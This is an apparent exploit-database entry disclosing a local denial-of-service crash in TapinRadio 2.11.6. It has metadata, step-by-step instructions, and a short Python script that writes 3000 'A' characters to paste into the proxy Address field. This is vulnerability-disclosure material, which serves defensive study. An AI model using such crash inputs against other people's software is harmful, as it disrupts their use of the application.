TapinRadio 2.11.6 - 'Address' Denial of Service (PoC)

vendor:

TapinRadio

by:

Victor Mondragón

7.8

CVSS

HIGH

Denial of Service

N/A

CWE

Product Name: TapinRadio

Affected Version From: 2.11.6

Affected Version To: 2.11.6

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7 Service Pack 1 x64

2019

TapinRadio 2.11.6 – ‘Address’ Denial of Service (PoC)

TapinRadio 2.11.6 is vulnerable to a denial of service attack when a maliciously crafted 'Address' field is supplied. An attacker can exploit this vulnerability by running a python code to generate a maliciously crafted 'Address' field, copying the content to clipboard, opening TapinRadio, selecting 'Settings' > 'Preferences' > 'Miscellaneous', selecting 'Set Application Proxy...', pasting the clipboard in the 'Address' field, typing '444' in the 'Port' field, typing 'test' in the 'Username' field, typing '1234' in the 'Password' field, selecting 'OK' and 'OK', and crashing the application.

Mitigation:

N/A

Source

Exploit-DB raw data:

#Exploit Title: TapinRadio 2.11.6 - 'Address' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-21
#Vendor Homepage: http://www.raimersoft.com/
#Software Link: www.raimersoft.com/downloads/tapinradio_setup_x64.exe
#Tested Version: 2.11.6
#Tested on: Windows 7 Service Pack 1 x64

#Steps to produce the crash:
#1.- Run python code: tapinadio_address.py
#2.- Open tapin_add.txt and copy content to clipboard
#3.- Open TapinRadio
#4.- Select "Settings" > "Preferences" > "Miscellaneous"
#5.- Select "Set Application Proxy..."" In "Address" field paste Clipboard
#6.- In Port type "444" > "Username" type "test" > Password type "1234"
#7.- Select "OK" and "OK"
#8.- Crashed

cod = "\x41" * 3000
	
f = open('tapin_add.txt', 'w')
f.write(cod)
f.close()